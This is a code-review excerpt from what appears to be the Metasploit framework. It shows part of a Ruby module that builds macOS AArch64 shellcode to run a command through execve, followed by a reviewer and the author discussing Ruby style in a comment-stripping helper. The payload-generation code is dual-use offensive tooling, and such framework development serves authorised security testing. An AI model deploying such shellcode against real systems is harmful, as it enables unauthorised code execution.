modules/payloads/singles/osx/aarch64/exec.rb

```diff
@@ -0,0 +1,159 @@
+            sub x1, x1, ##{bytes_to_base_of_string} // Update the target register to point to base of the string
+            str x1, [#{stack_register}], #8 // Store the pointer in the stack
+          EOF
+        end.join("\n")}
+
+      // argv[#{cmd_and_args.length}] = NULL
+      str xzr, [#{stack_register}], #8
+
+      // Set execve arg1 to the base of the argv array of pointers
+      mov x1, #{stack_register}
+      sub x1, x1, ##{(cmd_and_args.length + 1) * 8}
+
+      // Arg 2: execve - char *const envp[] - Environment variables, NULL for now
+      mov x2, xzr
+      // System call
+      svc #0
+    EOF
+
+    compile_aarch64(result)
+  end
+
+  def create_aarch64_string_in_stack(string, registers: {})
+    target = registers.fetch(:destination, :x0)
+    stack = registers.fetch(:stack, :x9)
+
+    # Instructions for pushing the bytes of the string 8 characters at a time
+    push_string = string.bytes
+                        .each_slice(8)
+                        .each_with_index
+                        .flat_map do |eight_byte_chunk, _chunk_index|
+      mov_instructions = eight_byte_chunk
+                         .each_slice(2)
+                         .each_with_index
+                         .map do |two_byte_chunk, index|
+        two_byte_chunk = two_byte_chunk.reverse
+        two_byte_chunk_hex = two_byte_chunk.map { |b| b.to_s(16).rjust(2, '0') }.join
+        two_byte_chunk_chr = two_byte_chunk.map(&:chr).join
+        "mov#{index == 0 ? 'z' : 'k'} #{target}, #0x#{two_byte_chunk_hex}#{index == 0 ? '' : ", lsl ##{index * 16}"} // #{two_byte_chunk_chr.inspect}"
+      end
+      [
+        "// Next 8 bytes of string: #{eight_byte_chunk.map(&:chr).join.inspect}",
+        *mov_instructions,
+        "str #{target}, [#{stack}], #8 // Store #{target} on #{stack}-stack and increment by 8"
+      ]
+    end.join("\n")
+    push_string += "\n"
+
+    set_target_register_to_base_of_string = <<~EOF
+      mov #{target}, #{stack} // Store the current stack location in the target register
+      sub #{target}, #{target}, ##{align(string.bytesize)} // Update the target register to point to base of the string
+    EOF
+
+    result = <<~EOF
+      #{push_string}
+      #{set_target_register_to_base_of_string}
+    EOF
+
+    result
+  end
+
+  def align(value, alignment: 8)
+    return value if value % alignment == 0
+
+    value + (alignment - (value % alignment))
+  end
+
+  def compile_aarch64(asm_string)
+    require 'aarch64/parser'
+    parser = ::AArch64::Parser.new
+    asm = parser.parse without_inline_comments(asm_string)
+
+    asm.to_binary
+  end
+
+  # Remove any human readable comments that have been inlined
+  def without_inline_comments(string)
+    comment_delimiter = '//'
+    result = +''
+    string.lines(chomp: true).each do |line|
+      instruction, _comment = line.split(comment_delimiter, 2)
+      next if instruction.blank?
+
+      result << "#{instruction}\n"
+    end
+    result
```

Comment:
```suggestion
    result = string.lines(chomp: true).map do |line|
      instruction, _comment = line.split(comment_delimiter, 2)
      next if instruction.blank?

      instruction
    end
    result.join("\n") + "\n"
```

- No need to declare `result` as an empty string (also, the `+` indicates that `result` may be optimized in some frozen-related instances, but since `result` is never frozen, it was a bit confusing/useless
- Having a final `join` is a bit simpler than a `result << "#{instruction}\n"` in a loop I think.

There might be a way to do something like `return string.lines(chomp: true).map(|line| line.split(comment_delimiter, 2)).filter(|instruction, _comment| !instruction.blank?).map(:&first).join("\n") + "\n"`, but I don't think it's more readable.

Reply:
The suggested approach leaks in `nil`, I hit that when I originally wrote a similar implementation to your suggestion too

I've swapped to `.map` and `.compact` though, since that's two of us that would've written it to be written your way 😄